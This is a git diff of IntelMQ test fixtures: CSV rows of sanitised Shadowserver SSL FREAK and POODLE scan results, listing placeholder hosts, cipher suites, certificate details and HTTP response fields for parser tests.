20:22:25,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,0,md5WithRSAEncryption,rsaEncryption,SomeOrganization,SomeOrganizationalUnit,--,SomeState,SomeCity,,,,,198-51-100-90.example.net,,,SomeOrganization,SomeOrganizationalUnit,--,SomeState,SomeCity,,,,,198-51-100-90.example.net,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,close,,,Apache/1.3.33 (Unix)  (Red-Hat/Linux) FrontPage/4.,31,,"Mon, 23 Apr 2018 13:27:02 GMT",Y,Y,Y,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:27:03,198.51.100.186,443,198-51-100-186.example.net,ssl-freak,TLSv1.0,31125,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,198-51-100-186.example.net,198-51-100-186.example.net,2013-07-11 12:20:19,2021-07-09 12:20:19,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,D947ED19BEAB28E6,sha1WithRSAEncryption,rsaEncryption,,IT,PL,SomeState,SomeCity,,,,,198-51-100-186.example.net,,,,IT,PL,SomeState,SomeCity,,,,,198-51-100-186.example.net,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,401,Unauthorized,text/plain,close,"Basic realm=""example.com""",,Microsoft-IIS/7.5,0,,"Mon, 23 Apr 2018 14:03:40 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:27:03,198.51.100.150,443,198-51-100-150.example.net,ssl-freak,TLSv1.0,8559,AT,BURGENLAND,NEUSIEDL AM SEE,TLS_ECDHE_RSA_WITH_RC4_128_SHA,2048,198-51-100-150.example.net,COMODO RSA Domain Validation Secure Server CA,2017-02-08 00:00:00,2019-05-09 23:59:59,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,B6EF6CF436532F0252627393BD7311FD,sha256WithRSAEncryption,rsaEncryption,,Domain Control Validated,,,,,,,,,,,,,GB,SomeState,SomeCity,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:27:06 GMT",N,N,N,N,DV,x509: certificate signed by unknown authority,,,,,,,,,,,
+2018-04-23 13:27:03,198.51.100.141,443,198-51-100-141.example.net,ssl-freak,TLSv1.0,39372,AT,OBEROSTERREICH,HINTERSTODER,TLS_RSA_WITH_RC4_128_SHA,1024,198-51-100-141.example.net,iLO Default Issuer (Do not trust),2014-01-14 00:00:00,2029-01-13 00:00:00,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,7852761B,sha1WithRSAEncryption,rsaEncryption,,,US,SomeState,SomeCity,,,,,,,,,,US,SomeState,SomeCity,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,,,,,,,,,N,N,N,N,unknown,x509: certificate signed by unknown authority,,,,,,,,,,,
+2018-04-23 13:27:04,198.51.100.194,443,198-51-100-194.example.net,ssl-freak,TLSv1.0,8447,AT,KARNTEN,GLAN,TLS_RSA_WITH_RC4_128_SHA,1024,iDRAC6 default certificate,iDRAC6 default certificate,2009-09-17 22:47:28,2019-09-15 22:47:28,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,1,sha1WithRSAEncryption,rsaEncryption,,Remote Access Group,US,SomeState,SomeCity,,,,,,,,,Remote Access Group,US,SomeState,SomeCity,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,302,Moved Temporarily,,keep-alive,,,Mbedthis-Appweb/2.4.2,0,,"Mon, 23 Apr 2018 13:25:57 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+"2022-02-07 00:01:41","2.136.0.0",10443,"2-136-0-0.example.com","ssl,ssl-freak,ssl-poodle,vpn","TLSv1.0",12345,"ES","MADRID","MADRID","TLS_RSA_WITH_RC4_128_SHA",1024,"usg50_107BEF336340","usg50_107BEF336340","2014-04-24 00:00:32","2034-04-19 00:00:32","F5:04:98:CD:D4:67:13:E1:77:B7:38:D4:B9:43:C0:72:50:6C:0D:58",53585420,"sha1WithRSAEncryption","rsaEncryption",,,,,,,,,,,,,,,,,,,,,,,,,517311,,"Y","TLS_RSA_EXPORT_WITH_RC4_40_MD5","Communications, Service Provider, and Hosting Service","AF:3A:71:B7:1B:A2:62:4E:87:22:FF:19:3F:84:1F:7F:CC:DC:06:E0:AF:80:E2:5D:33:A5:68:9A:E3:81:25:45","14:92:CC:6B:C7:B3:09:31:50:8C:1C:8D:5B:FD:D1:BE:41:78:80:97:E0:10:11:48:1F:EE:D6:CB:4F:F0:13:D5:05:56:AC:BA:12:12:02:F7:0F:03:40:95:17:8A:5F:79:98:E1:44:EF:E6:5A:44:E3:AC:3A:F8:49:F7:AC:B6:52","E8:5F:96:16:3F:76:35:F0:07:4F:4C:2C:38:FC:27:6B","HTTP/1.1",200,"OK","text/html",,,,"",,"chunked","Mon, 07 Feb 2022 00:01:43 GMT","Y","Y","N","N","unknown","x509: unknown error",,,,,,"Zyxel","firewall","ZyWALL USG 50",,"enterprise",
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssl_poodle.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssl_poodle.csv
index 75e474986..4bcc6758a 100644
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssl_poodle.csv
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssl_poodle.csv
@@ -1,31 +1,32 @@
-"timestamp","ip","port","hostname","tag","handshake","asn","geo","region","city","cipher_suite","ssl_poodle","cert_length","subject_common_name","issuer_common_name","cert_issue_date","cert_expiration_date","sha1_fingerprint","cert_serial_number","ssl_version","signature_algorithm","key_algorithm","subject_organization_name","subject_organization_unit_name","subject_country","subject_state_or_province_name","subject_locality_name","subject_street_address","subject_postal_code","subject_surname","subject_given_name","subject_email_address","subject_business_category","subject_serial_number","issuer_organization_name","issuer_organization_unit_name","issuer_country","issuer_state_or_province_name","issuer_locality_name","issuer_street_address","issuer_postal_code","issuer_surname","issuer_given_name","issuer_email_address","issuer_business_category","issuer_serial_number","naics","sic","sector","sha256_fingerprint","sha512_fingerprint","md5_fingerprint","http_response_type","http_code","http_reason","content_type","http_connection","www_authenticate","set_cookie","server_type","content_length","transfer_encoding","http_date","cert_valid","self_signed","cert_expired","browser_trusted","validation_level","browser_error","tlsv13_support","tlsv13_cipher"
-"2018-08-08 00:51:42","203.0.113.85",8443,"example.com","ssl-poodle","TLSv1.0",65540,"AT","WIEN","VIENNA","TLS_RSA_WITH_RC4_128_SHA","Y",1024,"usg20_107BEF394BA5","usg20_107BEF394BA5","2014-06-25 00:00:42","2034-06-20 00:00:42","04:FA:DE:1D:BD:4A:05:25:61:FB:F3:D6:64:74:66:44:01:22:D7:C3","53AA112A",2,"sha1WithRSAEncryption","rsaEncryption",,,,,,,,,,,,,,,,,,,,,,,,,0,0,,"16:25:9F:C7:A1:8D:64:1F:D9:25:42:BF:87:5C:4F:F3:63:14:97:21:EC:B6:67:10:F2:CA:52:37:C9:FE:49:2E","0B:2D:48:8C:4B:55:8B:F3:AB:F8:45:ED:E0:A0:63:F4:84:2F:4C:19:DC:A8:6F:7D:6A:AF:61:D7:98:AA:58:0F:CB:CA:87:D2:C3:0B:C5:DF:49:A7:84:7C:47:58:89:7D:92:B6:7B:98:7D:B1:64:4B:DC:DD:BE:9D:11:2A:D1:AE","33:E3:61:3F:5D:AA:96:99:38:A5:D6:F1:11:C7:ED:FC","HTTP/1.1",200,"OK","text/html",,,,,,"chunked","Wed, 08 Aug 2018 00:51:44 GMT","Y","Y","N","N","unknown","x509: unknown error"
-2018-04-19 13:32:27,198.51.100.147,443,,ssl-poodle,TLSv1.0,8445,AT,SALZBURG,SALZBURG,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA,Y,2048,198-51-100-147.example.net,some_issuer,2017-09-18 08:22:17,2019-09-18 08:22:17,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,746481F100000000000C,2,sha1WithRSAEncryption,rsaEncryption,some_org_name,some_org_name,AT,Tirol,Ehrwald,,,,,,,,,,,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,Microsoft-IIS/7.5,689,,"Thu, 19 Apr 2018 13:32:32 GMT",N,N,N,N,unknown,x509: certificate signed by unknown authority
-2018-04-19 13:32:32,198.51.100.207,443,198-51-100-94.example.net,ssl-poodle,TLSv1.0,25255,AT,SALZBURG,SALZBURG,TLS_RSA_WITH_RC4_128_SHA,Y,1024,example,some_issuer,2004-06-03 11:11:43,2024-05-29 11:11:43,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,0,2,md5WithRSAEncryption,rsaEncryption,,,US,,,,,,,,,,,,US,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,close,,"rg_cookie_session_id=1654544029; path=/; expires=Fri, 01 Jan 2038",,,,"Thu, 19 Apr 2018 13:32:34 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-19 13:32:32,198.51.100.200,443,198-51-100-200.example.net,ssl-poodle,TLSv1.2,8445,AT,SALZBURG,,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA,Y,2048,198-51-100-200.example.net,198-51-100-200.example.net,2016-10-01 14:09:12,2020-10-02 14:09:12,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,2E8C9E4A2C7D3EDC,2,sha256WithRSAEncryption,rsaEncryption,some_org_name,,AT,,,,,,,,,,some_org_name,,AT,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html; charset=utf-8,close,,,,,,,N,Y,N,N,unknown,x509: unknown error
-2018-04-19 13:32:33,198.51.100.239,443,198-51-100-239.example.net,ssl-poodle,TLSv1.0,8437,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,Y,1024,198-51-100-239.example.net,198-51-100-239.example.net,2011-07-27 13:30:18,2012-07-26 13:30:18,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,7C91,2,sha1WithRSAEncryption,rsaEncryption,some_org_name,some_org_name,--,SomeState,SomeCity,,,,,198-51-100-239.example.net,,,SomeOrganization,SomeOrganizationalUnit,--,SomeState,SomeCity,,,,,198-51-100-239.example.net,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,403,Forbidden,text/html; charset=UTF-8,close,,,Apache/2.2.3 (CentOS),4958,,"Thu, 19 Apr 2018 13:32:35 GMT",Y,Y,Y,N,unknown,x509: unknown error
-2018-04-19 13:32:35,198.51.100.156,443,,ssl-poodle,TLSv1.0,8447,AT,NIEDEROSTERREICH,,TLS_RSA_WITH_RC4_128_SHA,Y,1024,example,some_issuer,2010-01-01 00:00:52,2029-12-27 00:00:52,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,4B3D3B34,2,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Thu, 19 Apr 2018 13:32:37 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-19 13:32:36,198.51.100.122,443,198-51-100-122.example.net,ssl-poodle,TLSv1.2,36351,AT,AUSTRIA,?,TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,Y,2048,198-51-100-122.example.net,COMODO RSA Organization Validation Secure Server CA,2017-04-06 00:00:00,2019-04-06 23:59:59,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,CAB81F32F3FF4766BC545A2C14DF34B5,2,sha256WithRSAEncryption,rsaEncryption,some_org_name,some_org_name,AT,Wien,Wien,,1130,,,,,,COMODO CA Limited,,GB,Greater Manchester,Salford,,,,,,,,518210,737401,Information Technology,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,Apache,0,,"Thu, 19 Apr 2018 13:32:20 GMT",Y,N,N,Y,OV,
-2018-04-19 13:32:37,198.51.100.58,443,198-51-100-58.example.net,ssl-poodle,TLSv1.2,12605,AT,OBEROSTERREICH,LINZ,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA,Y,2048,example,some_issuer,2015-01-17 16:11:24,2020-01-17 16:11:24,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,6D9E2D4443F1D69E4A8865CC1C5B6963,2,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,Microsoft-IIS/8.5,701,,"Thu, 19 Apr 2018 13:34:53 GMT",N,Y,N,N,unknown,x509: unknown error
-2018-04-19 13:32:38,198.51.100.18,443,198-51-100-18.example.net,ssl-poodle,TLSv1.2,6830,AT,OBEROSTERREICH,LINZ,TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,Y,2048,198-51-100-18.example.net,TERENA SSL CA 3,2017-07-14 00:00:00,2020-07-22 12:00:00,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,0386AD387BEC13878473D23C8C786ECE,2,sha256WithRSAEncryption,rsaEncryption,some_org_name,some_org_name,AT,,Linz,,,,,,,,TERENA,,NL,Noord-Holland,Amsterdam,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,302,Found,,Close,,BNIS_ChallengeState=Bqyd+IQebjQwiiYNKBJkA5Ta0spL1gX5; Path=/; Exp,,61,,,Y,N,N,Y,OV,
-2018-04-19 13:32:38,198.51.100.246,443,,ssl-poodle,TLSv1.2,8447,AT,SALZBURG,SALZBURG,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA,Y,2048,example,some_issuer,2014-09-01 16:18:46,2054-08-24 16:18:46,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,129FA64A4BE039B54E850F1AA65AD835,2,sha256WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,302,Found,text/html; charset=utf-8,,,ASP.NET_SessionId=e3qfk1dfz2mtqwzoym3gul3r; path=/; HttpOnly,Microsoft-IIS/8.5,145,,"Thu, 19 Apr 2018 13:32:40 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-19 13:32:39,198.51.100.35,443,198-51-100-35.example.net,ssl-poodle,TLSv1.0,12605,AT,OBEROSTERREICH,LINZ,TLS_RSA_WITH_AES_128_CBC_SHA,Y,2048,198-51-100-35.example.net,Go Daddy Secure Certificate Authority - G2,2017-08-28 13:29:01,2018-09-10 06:28:49,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,90B22B4CEF57C0FC,2,sha256WithRSAEncryption,rsaEncryption,,some_org_name,,,,,,,,198-51-100-35.example.net,,,,,US,Arizona,Scottsdale,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,Microsoft-IIS/7.5,266,,"Thu, 19 Apr 2018 13:35:03 GMT",Y,N,N,Y,DV,
-2018-04-19 13:32:39,198.51.100.142,443,,ssl-poodle,TLSv1.0,8447,AT,WIEN,VIENNA,TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA,Y,2048,198.51.100.19,198-51-100-19.example.net,2014-12-11 09:57:33,2024-12-08 09:57:33,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,A0571DCBE5E1A2C062D8FB7001271581B5F69824157E385563FA23527E0B,2,sha256WithRSAEncryption,rsaEncryption,some_org_name,some_org_name,DE,,,,,,,198-51-100-19.example.net,,,some_org_name,Engineering,DE,NRW,Wuerselen,,,,,198-51-100-19.example.net,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,Close,,,LANCOM,,,"Thur, 19 Apr 2018 13:32:41 GMT",Y,N,N,N,unknown,x509: unknown error
-2018-04-19 13:32:39,198.51.100.178,443,,ssl-poodle,TLSv1.0,8447,AT,NIEDEROSTERREICH,,TLS_RSA_WITH_RC4_128_SHA,Y,1024,example,some_issuer,2012-05-30 00:00:44,2032-05-25 00:00:44,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,4FC5632C,2,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Thu, 19 Apr 2018 13:32:41 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-19 13:32:40,198.51.100.99,443,198-51-100-99.example.net,ssl-poodle,TLSv1.2,6830,AT,WIEN,VIENNA,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA,Y,2048,198-51-100-99.example.net,RapidSSL RSA CA 2018,2018-03-30 00:00:00,2019-04-29 12:00:00,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,0BDCB5D6D4C22BD2A1CF55584B6DE09C,2,sha256WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,DigiCert Inc,198-51-100-99.example.net,US,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,404,Not Found,text/html; charset=us-ascii,close,,,Microsoft-HTTPAPI/2.0,315,,"Thu, 19 Apr 2018 13:32:43 GMT",Y,N,N,Y,DV,
-2018-04-19 13:32:40,198.51.100.235,443,198-51-100-235.example.net,ssl-poodle,TLSv1.0,25255,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,Y,1024,Nextcloud,Nextcloud,2016-12-13 20:28:39,2017-01-12 20:28:39,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,CDE5769D28C80B6B,2,sha1WithRSAEncryption,rsaEncryption,some_org_name,,AU,Some-State,,,,,,,,,Internet Widgits Pty Ltd,,AU,Some-State,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,400,Bad Request,text/html; charset=UTF-8,close,,nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fr,Apache/2.4.10 (FreeBSD) OpenSSL/0.9.8zd-freebsd PH,6939,,"Thu, 19 Apr 2018 13:32:42 GMT",Y,Y,Y,N,unknown,x509: unknown error
